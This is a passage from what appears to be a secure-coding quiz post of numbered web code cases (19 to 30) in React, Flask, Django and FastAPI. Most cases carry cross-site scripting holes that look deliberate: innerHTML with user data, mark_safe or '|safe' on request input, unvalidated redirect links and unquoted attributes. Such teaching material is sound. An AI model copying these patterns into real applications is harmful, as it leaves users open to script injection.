class="nf">useState</span><span class="p">(</span><span class="dl">""</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">bioRef</span> <span class="o">=</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/users/</span><span class="p">${</span><span class="nx">username</span><span class="p">}</span><span class="s2">/bio`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="nf">setBio</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">bio</span><span class="p">));</span> <span class="p">},</span> <span class="p">[</span><span class="nx">username</span><span class="p">]);</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">bio</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">bio</span><span class="p">]);</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h2</span><span class="o">&gt;</span><span class="nx">About</span> <span class="p">{</span><span class="nx">username</span><span class="p">}</span><span class="o">&lt;</span><span class="sr">/h2</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">bioRef</span><span class="p">}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/div</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Case 20 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/redirect</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">redirect_user</span><span class="p">():</span> <span class="n">destination</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">dest</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/home</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">redirect.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">destination</span><span class="o">=</span><span class="n">destination</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/redirect.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;p&gt;</span>Click below to continue:<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"{{ destination }}"</span><span class="nt">&gt;</span>Continue<span class="nt">&lt;/a&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 21 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Notifications<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"notification-bar"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nb">window</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">message</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">notification-bar</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;p&gt;New message: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 22 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="k">def</span> <span class="nf">user_badge</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">viewer</span><span class="sh">"</span><span class="p">)</span> <span class="n">badge</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">"</span><span class="s">&lt;span class=</span><span class="sh">'</span><span class="s">badge</span><span class="sh">'</span><span class="s">&gt;{}&lt;/span&gt; logged in as </span><span class="sh">"</span> <span class="o">+</span> <span class="n">username</span><span class="p">,</span> <span class="n">role</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">badge.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">badge</span><span class="sh">"</span><span class="p">:</span> <span class="n">badge</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- badge.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"header"</span><span class="nt">&gt;</span> {{ badge | safe }} <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 23 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">reviews</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/review</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_review</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">body</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">clean</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">body</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">text</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">reviews</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">clean</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/reviews</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_reviews</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span> <span class="sh">"</span><span class="s">reviews.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">reviews</span><span class="sh">"</span><span class="p">:</span> <span class="n">reviews</span><span class="p">}</span> <span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/reviews.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Customer Reviews<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for review in reviews %} <span class="nt">&lt;li&gt;</span>{{ review | safe }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 24 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">safe_query</span> <span class="o">=</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">search.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="n">safe_query</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- search.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Search<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"GET"</span> <span class="na">action=</span><span class="s">"/search"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"q"</span> <span class="na">value=</span><span class="s">"{{ query }}"</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Search<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 25 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Loading...<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Welcome<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>Loading your page...<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">page</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">Home</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">page</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">content</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;h2&gt;You are viewing: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">page</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/h2&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 26 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">username</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">password</span><span class="p">:</span> <span class="n">error</span> <span class="o">=</span> <span class="nf">escape</span><span class="p">(</span><span class="sh">"</span><span class="s">Error: username and password are required.</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">login.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="n">error</span><span class="p">)</span> <span class="k">if</span> <span class="n">username</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span> <span class="ow">or</span> <span class="n">password</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">secret</span><span class="sh">"</span><span class="p">:</span> <span class="n">error</span> <span class="o">=</span> <span class="nf">escape</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Error: invalid credentials for user </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'</span><span class="s">.</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">login.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="n">error</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Welcome!</span><span class="sh">"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/login.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">action=</span><span class="s">"/login"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"username"</span> <span class="na">placeholder=</span><span class="s">"Username"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"password"</span> <span class="na">name=</span><span class="s">"password"</span> <span class="na">placeholder=</span><span class="s">"Password"</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Login<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> {% if error %} <span class="nt">&lt;script&gt;</span> <span class="nf">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ error }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> {% endif %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 27 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span><span class="p">,</span> <span class="n">mark_safe</span> <span class="k">def</span> <span class="nf">search_results</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">Result 1</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Result 2</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Result 3</span><span class="sh">"</span><span class="p">]</span> <span class="n">items_html</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span> <span class="n">items_html</span> <span class="o">+=</span> <span class="nf">format_html</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;li&gt;{}&lt;/li&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="n">result</span><span class="p">)</span> <span class="n">summary</span> <span class="o">=</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">&lt;p&gt;Showing results for: &lt;strong&gt;</span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="s">&lt;/strong&gt;&lt;/p&gt;</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">results.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">summary</span><span class="sh">"</span><span class="p">:</span> <span class="n">summary</span><span class="p">,</span> <span class="sh">"</span><span class="s">items_html</span><span class="sh">"</span><span class="p">:</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">items_html</span><span class="p">),</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- results.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Search Results<span class="nt">&lt;/h1&gt;</span> {{ summary }} <span class="nt">&lt;ul&gt;</span> {{ items_html }} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 28 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/profile</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">,</span> <span class="n">theme</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">light</span><span class="sh">"</span><span class="p">):</span> <span class="n">safe_username</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">username</span><span class="p">))</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">safe_username</span><span class="p">,</span> <span class="sh">"</span><span class="s">theme</span><span class="sh">"</span><span class="p">:</span> <span class="n">theme</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">{{</span> <span class="na">theme</span> <span class="err">}}</span><span class="nt">&gt;</span> <span class="nt">&lt;h1&gt;</span>Welcome, {{ username }}!<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Your profile is loading...<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 29 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Support Chat<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Live Support<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"chat-log"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">id=</span><span class="s">"msg-input"</span> <span class="na">placeholder=</span><span class="s">"Type a message..."</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">onclick=</span><span class="s">"sendMessage()"</span><span class="nt">&gt;</span>Send<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">chatLog</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">chat-log</span><span class="dl">"</span><span class="p">);</span> <span class="kd">function</span> <span class="nf">sendMessage</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msg-input</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">encoded</span> <span class="o">=</span> <span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">msg</span><span class="p">);</span> <span class="nx">chatLog</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">+=</span> <span class="dl">"</span><span class="s2">&lt;p&gt;&lt;strong&gt;You:&lt;/strong&gt; </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">encoded</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 30 </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// components/CommentFeed.jsx</span> <span class="kd">function</span> <span class="nf">CommentFeed</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">comments</span><span class="p">,</span> <span class="nx">setComments</span><span class="p">]</span> <span class="o">=</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useState</span><span class="p">([]);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">input</span><span class="p">,</span> <span class="nx">setInput</span><span class="p">]</span> <span class="o">=</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useState</span><span class="p">(</span><span class="dl">""</span><span class="p">);</span> <span class="kd">function</span> <span class="nf">addComment</span><span class="p">()</span> <span class="p">{</span> <span class="nf">setComments</span><span class="p">([...</span><span class="nx">comments</span><span class="p">,</span> <span class="nx">input</span><span class="p">]);</span> <span class="nf">setInput</span><span class="p">(</span><span class="dl">""</span><span class="p">);</span> <span class="p">}</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">h2</span><span class="o">&gt;</span><span class="nx">Comments</span><span class="o">&lt;</span><span class="sr">/h2</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">text</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="p">{</span><span class="nx">input</span><span class="p">}</span> <span class="nx">onChange</span><span class="o">=</span><span class="p">{</span><span class="nx">e</span> <span class="o">=&gt;</span> <span class="nf">setInput</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">button</span> <span class="nx">onClick</span><span class="o">=</span><span class="p">{</span><span class="nx">addComment</span><span class="p">}</span><span class="o">&gt;</span><span class="nx">Post</span><span class="o">&lt;</span><span class="sr">/button</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">ul</span><span class="o">&gt;</span> <span class="p">{</span><span class="nx">comments</span><span class="p">.</span><span class="nf">map</span><span class="p">((</span><span class="nx">comment</span><span class="p">,</span> <span class="nx">i</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">(</span> <span class="o">&lt;</span><span class="nx">li</span> <span class="nx">key</span><span class="o">=</span><span class="p">{</span><span class="nx">i</span><span class="p">}</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">el</span> <span class="o">=&gt;</span> <span class="nx">el</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">el</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">comment</span><span class="p">)}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="p">))}</span> <span class="o">&lt;</span><span class="sr">/ul</span><span 